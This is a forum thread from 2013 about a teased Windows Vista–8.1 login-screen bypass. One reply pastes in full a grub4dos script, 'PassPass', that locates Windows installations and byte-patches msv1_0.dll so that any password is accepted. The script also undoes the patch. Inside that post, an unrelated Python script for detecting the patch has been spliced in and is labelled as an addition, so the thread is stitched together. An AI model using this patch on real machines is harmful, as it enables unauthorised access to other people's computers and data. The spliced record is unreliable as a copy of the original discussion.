Windows 6.0-8.1 Security Bug!

Discussion in 'Forum Games' started by Marcin-prv, Jun 2, 2013.

  1. Marcin-prv

    Marcin-prv MDL Novice

    Nov 15, 2012
    22
    4
    0
    #1 Marcin-prv, Jun 2, 2013
    Last edited by a moderator: Apr 20, 2017
  2. KNARZ

    KNARZ MDL Addicted

    Oct 9, 2012
    895
    482
    30
    :tea: Based on the screenshot (and nothing else) it seems you rename cmd to osk and then use the on-screen keyboard at login. Very, very old.
     
  3. Humphrey

    Humphrey MDL Expert

    Dec 13, 2011
    1,466
    990
    60
    At least the video was interesting.. :bangin:
     
  4. Garbellano

    Garbellano MDL Addicted

    Aug 13, 2012
    947
    248
    30
  5. Marcin-prv

    Marcin-prv MDL Novice

    Nov 15, 2012
    22
    4
    0
    #5 Marcin-prv, Jun 3, 2013
    Last edited: Jun 3, 2013
    (OP)
    I do not rename cmd or any other files :)
     
  6. alicepattinson

    alicepattinson MDL Member

    Jan 29, 2013
    175
    32
    10
    Why spam? Hmmmmm. I think not :)
     
  7. KNARZ

    KNARZ MDL Addicted

    Oct 9, 2012
    895
    482
    30
    Maybe it's indeed a find which is something different, but the whole way you present it is - and I don't want to be rude - awfully ridiculous.
    The domain, the videos... the 'top secret' presentation... seriously? It's all more about self-portrayal than anything else. I personally don't like this kind of behavior.
     
  8. Humphrey

    Humphrey MDL Expert

    Dec 13, 2011
    1,466
    990
    60
    I believe he has come here,
    made the correct amount of posts
    to post links for the purpose of getting hits on his YouTube video and website.

    And it's not saying the "bug" doesn't matter, but even if they did fix it there are several other methods of getting past the login screen when it's passworded.
     
  9. Marcin-prv

    Marcin-prv MDL Novice

    Nov 15, 2012
    22
    4
    0
    I know this is going to sound ridiculous...
    No one has to play this game, but if you want to get my guide you will need to solve the quiz :icecream:
     
  10. Humphrey

    Humphrey MDL Expert

    Dec 13, 2011
    1,466
    990
    60
    I hope someone solves it and spreads it like wildfire. :coffee:
     
  11. BTOR

    BTOR MDL Addicted

    Nov 18, 2009
    574
    584
    30

    If I am not mistaken, is it not How to hack Windows 6.0-6.3 [for NT 8.1 to come, will have to wait for years]

    You do not have any pattern for us to follow, for instance take 3 -> 66 -> X -> Y, [you should provide the X for anyone to take a guess]

    The truth is, to solve your puzzle we must first find the question then the answer.

    And I would like to say the same: May the brain be with you!
     
  12. HALIKUS

    HALIKUS MDL Addicted

    Jul 29, 2009
    526
    371
    30
    #12 HALIKUS, Jun 18, 2013
    Last edited by a moderator: Apr 20, 2017
    Meh, this is a website for sharing ideas, not hoarding them and doing shameless self promotion. I don't need your guide, if you want to get past the login, all you need is a 6 kb file and a little grub4dos knowledge :)

    Code:
    !BAT
    
    errorcheck off
    debug off
    insmod /%grub%/wenv > nul
    insmod %0 > nul
    
    
    :: Call the subroutine specified as first parameter of the script
    if "%1"=="findDLL" goto :findDLL
    if "%1"=="findWinVer" goto :findWinVer
    if "%1"=="isWinDir" goto :isWinDir
    if "%1"=="patchUnpatch" goto :patchUnpatch
    if "%1"=="patchDLL" goto :patchDLL
    if "%1"=="unPatchDLL" goto :unPatchDLL
    if "%1"=="help" goto :help
    
    
    set dll = /system32/msv1_0.dll
    set osDrv = (md)0x2000+1
    set patchDrv = (md)0x2300+1
    set devDrv = (md)0x2500+1
    set dirDrv = (md)0x5800+80
    echo -e \x0 > %osDrv%## Initialize mem drive
    
    
    :: Find Windows installations
    
    :: Attempt to auto-detect Windows installation
    if not "%1"=="" goto :forceDetect
    :: If debug is off, nothing is written to output
    :: If debug is on, output is too verbose
    :: So, set debug to normal and turn it off immediately after
    debug normal
    find --devices=h > %devDrv%
    debug off
    set /a skip = 0
    :autoLoop
    cat --locate=\x0a --number=1 --skip=%skip% %devDrv% || goto :displayMenu
    set /a length = %?% - %skip%
    cat --skip=%skip% --length=%length% %devDrv% | set dev =
    set /a skip = %length% + %skip% + 1
    call %0 findDLL %dev%
    goto :autoLoop
    
    
    :: Force detection of Windows installation
    :forceDetect
    /%grub%/wenv for /L %p in (0,1,%1) do for /L %q in (0,1,%2) do exec %0 findDLL %p %q## Iterate over HD partitions
    
    
    :displayMenu
    if "%os%"==""  echo No Windows installation found!&& pause && goto :EOF## Display Windows installations found
    echo -e \ntitle Back to Main Menu \nconfigfile /%grub%/menu.lst \nboot >> %osDrv%
    echo -e \x0 >> %osDrv%## EOF marker for configfile
    configfile %osDrv%
    goto :EOF
    
    
    :: =======================  SUBROUTINES  =======================
    
    
    :: Searches for msv1_0.dll, %1 = findDLL, %2 = Disk#, %3 = Partition#
    :findDLL
    set dllRoot = %2
    if not "%dllRoot:~0,1%"=="(" set dllRoot = (hd%2,%3)
    /%grub%/wenv dir %dllRoot%/ > %dirDrv%
    /%grub%/wenv for /f %i in ( %dirDrv% ) do exec %0 isWinDir %i
    goto :EOF
    
    
    :: Checks if the directory contains Windows installation, %1 = isWinDir, %2 = Directory
    :isWinDir
    set dllPath = %dllRoot%/%2%dll%
    cat --length=0 %dllPath% || goto :EOF## Don't proceed further for non-existent partitions
    :: Start forming menu items
    set grubMenu = \ntitle Windows
    :: Check for Windows version based on size of msv1_0.dll
    call %0 findWinVer %dllPath%
    set grubMenu = %grubMenu% %os% at %dllRoot% \ncall %0 patchUnpatch %dllRoot% %2 \npause \nboot
    echo -e %grubMenu% >> %osDrv%## Write configfile to mem drive
    goto :EOF
    
    
    :: Find version of Windows installed
    :: This batch should print the version of
    :: .dll's tested on 32-bit ONLY
    :: You must provide a fully qualified path as parameter.
    :: Example: (hd0,0)/Windows/System32/msv1_0.dll
    :: or a valid relative path from current ROOT:
    :: /Windows/System32/msv1_0.dll
    :findWinVer
    # String is "FileV" in Unicode
    set file=%~dpnx2
    set string=\x01\x00\x46\x00\x69\x00\x6C\x00\x65\x00\x56\x00
    set version=
    set char=
    
    cat --hex --locate=%string% %file% > nul
    set /a offbase = %?% + 27
    
    set /a counter=1
    :loop
    set /a figure=0
    set /a offset=%offbase%+%counter%
    cat --skip=%offset% --length=1 %file% | set char=
    
    :floop
    if "%char%"=="%figure%" set version=%version%%%char%
    set /a figure=%figure%+1
    if "%figure%"=="10" goto :fnext
    goto :floop
    
    :fnext
    if "%char%"=="." set version=%version%%%char%
    set /a counter=%counter%+1
    if "%counter%"=="30" goto :next
    goto :loop
    
    :next
    set majmin=%version:~0,3%
    set os=(Unknown)
    if "%majmin%"=="5.0" set os=2000
    if "%majmin%"=="5.1" set os=XP
    if "%majmin%"=="5.2" set os=XP 64-bit or Server 2003
    if "%majmin%"=="6.0" set os=Vista or Server 2008
    if "%majmin%"=="6.1" set os=7 or Server 2008 R2
    if "%majmin%"=="6.2" set os=8 or Server 2012
    goto :EOF
    
    
    :: Patch or Unpatch?
    :patchUnpatch
    echo -e title Patch \ncall %0 patchDLL %2 %3 \npause \nboot > %patchDrv%
    echo -e title UnPatch \ncall %0 unPatchDLL %2 %3 \npause \nboot >> %patchDrv%
    echo -e title Back to OS detection \nconfigfile %osDrv% \npause \nboot >> %patchDrv%
    echo -e \x0 >> %patchDrv%## EOF marker for configfile
    configfile %patchDrv%
    goto :EOF
    
    
    :: Patches DLL file, %1 = patchDLL, %2 = (hdX,Y), %3 = WinDir
    :patchDLL
    set dllPath = %2/%3%dll%
    cat --locate=\x33\xC0\x90 %dllPath% > nul
    if "%@retval%"=="1" goto :warnUser
    :: Check for 0x6486 to identify 64-bit PE
    cat --locate=\x64\x86 %dllPath% > nul
    if "%@retval%"=="1" goto :64BitPatch
    cat --hex --locate=\x83\xF8\x10 --replace=\x33\xC0\x90 %dllPath% > nul
    goto :patchMessage
    :64BitPatch
    cat --hex --locate=\x48\x3B\xC6\x0F\x85 --replace=\x33\xC0\x90\x0F\x85 %dllPath% > nul
    :patchMessage
    echo DLL patched
    goto :EOF
    :warnUser
    echo This DLL version is not compatible or has been already patched
    configfile %osDrv%
    goto :EOF
    
    
    :: Unpatches DLL file, %1 = patchDLL, %2 = (hdX,Y), %3 = WinDir
    :unPatchDLL
    set dllPath = %2/%3%dll%
    :: Check for 0x6486 to identify 64-bit PE
    cat --locate=\x64\x86 %dllPath% > nul
    if "%@retval%"=="1" goto :64BitUnpatch
    cat --hex --locate=\x33\xC0\x90 --replace=\x83\xF8\x10 %dllPath% > nul
    goto :unpatchMessage
    :64BitUnpatch
    cat --hex --locate=\x33\xC0\x90\x0F\x85 --replace=\x48\x3B\xC6\x0F\x85 %dllPath% > nul
    :unpatchMessage
    echo DLL unpatched
    goto :EOF
    
    
    :help
    echo -e \nPassPass v1.0 - Idea by jaclaz, Coded by Sherlock
    echo Released under the jaclaz's CAREWARE license
    echo -e \nUsage: PassPass.g4b <MaxDisk#> <MaxPartition#>\n
    echo By default, PassPass tries to autodetect Windows installations
    echo If autodetection fails, provide MaxDisk# and MaxPartition# 
    echo to forcedetect and guide the script manually 
    echo PassPass.g4b script and /%grub%/wenv binary need to be
    echo present on the root of the boot media.
    
    
     
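A defender-side check for the byte patch applied by the script in the post above, as an added example that is not part of the original post or of PassPass: it reads the PE header to pick the architecture (rather than searching the whole file for `\x64\x86`) and reports where the replacement bytes occur. The function names and the `fake_pe` sample image are constructed for illustration; a hit is a heuristic only and should be confirmed by comparing the file's hash or signature against a known-good copy of msv1_0.dll.

```python
import struct

# Byte sequences copied from the patchDLL / unPatchDLL routines in the post above.
ORIG_32, ORIG_64 = b"\x83\xF8\x10", b"\x48\x3B\xC6\x0F\x85"
PATCH_32, PATCH_64 = b"\x33\xC0\x90", b"\x33\xC0\x90\x0F\x85"
MACHINES = {0x014C: "x86", 0x8664: "x64"}

def pe_machine(data):
    """Return 'x86' or 'x64' from the PE file header, or None if not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    return MACHINES.get(machine)

def offsets(data, needle):
    """All file offsets at which needle occurs (overlaps included)."""
    out, i = [], data.find(needle)
    while i != -1:
        out.append(i)
        i = data.find(needle, i + 1)
    return out

def triage(data):
    """Classify an image by which of the script's byte patterns it contains."""
    arch = pe_machine(data)
    if arch is None:
        return {"arch": None, "verdict": "not-pe", "patched_at": []}
    patch, orig = (PATCH_64, ORIG_64) if arch == "x64" else (PATCH_32, ORIG_32)
    hits = offsets(data, patch)
    # Heuristic: short patterns can also occur in unmodified code.
    verdict = "suspect" if hits else (
        "original-bytes-present" if offsets(data, orig) else "unknown-build")
    return {"arch": arch, "verdict": verdict, "patched_at": hits}

def fake_pe(machine, body):
    """Constructed sample: minimal MZ/PE header stub followed by body bytes."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\0\0" + struct.pack("<H", machine) + b"\0" * 18 + body

if __name__ == "__main__":
    print(triage(fake_pe(0x8664, b"\xcc" * 8 + PATCH_64 + b"\xcc")))
```

Run it against an offline copy of the DLL (for example from a mounted disk image) with `triage(open(path, "rb").read())`.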
  13. Tito

    Tito Super Mod / Adviser
    Staff Member

    Nov 30, 2009
    18,681
    18,589
    340
  14. Bytebuster

    Bytebuster MDL Addicted

    Apr 30, 2013
    551
    203
    30
    'supposed to be a game' roflmao, I like your sense of humor. :D ...as Tito's brains compute very fast you should've excluded him from contesting, lol)